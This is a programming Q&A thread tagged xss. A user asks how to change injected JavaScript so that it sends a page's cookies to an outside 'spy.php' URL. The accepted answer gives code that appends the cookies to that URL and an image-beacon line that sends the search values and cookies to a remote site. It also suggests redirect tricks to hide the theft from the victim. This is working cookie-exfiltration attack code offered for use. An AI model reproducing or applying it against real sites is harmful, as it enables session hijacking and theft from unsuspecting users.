# cookies and JavaScript

Tags: javascript, cookies, xss

I have this script which sends whatever is entered in search-form (i.e the id of the search-form) to the given URL

```
 <script type="text/javascript">
document.getElementById("search-form").action="http://scitua.wlv.ac.uk/~in1345/spy.php";
</script >
```

How can I edit the script so that it sends the document cookies intsead to the URL?

Comment: I need to understand what you're looking to do exactly... you want to send the cookies from the current page (in domain xyz.com) to another domain (scitua.wlv.ac.uk)?  what is it that you're aiming to achieve by this?

Comment: Yes @TheZuck that is what I want to do. Any idea of how the above script can be modified to achieve this purpose?

Answer (score 0, accepted):

**Original answer:**

```
".../spy.php?param=" + encodeURIComponent(document.cookies);
```

---

Ok, so you have two options:

1. Fully redirect the search to spying site and from spying site redirect user back to the first page. You can do it through javascript `location.replace` if you dont want to keep the spying site in the history.
2. Second way is more sophisticated. On search form submit you set a cookie like this then you let the search form submit. On the search page you will check for that cookie and if it was set you will read and delete it. Ok, you have the value now you need to send it. Easy way to do is:

   ```
   new Image().src="your_site?search="+search_val"+"&cookies="+document.cookies;
   ```

   if you havent access to the search page you can also the info directly when user submit the search form but this can be very suspecting because user would wait until the data are sent to you.

Comment: thanks very much for your help, but unfortunately the script still didn't work :(

Comment: @IBK Until you dont post more detailed info, I cannot help you

Comment: there is a web page that has a search form. Using the above script, anything I search for in the search form is sent to the URL "http://scitua.wlv.ac.uk/~in1345/spy.php". In the same way, what I want is that when I search for anything in the search form of the first web page, it should also send the document cookies to the URL "http://scitua.wlv.ac.uk/~in1345/spy.php"

Comment: @IBK Correct me if I am wrong. You want to stay on the first page but asynchroniously send cookies to spying page?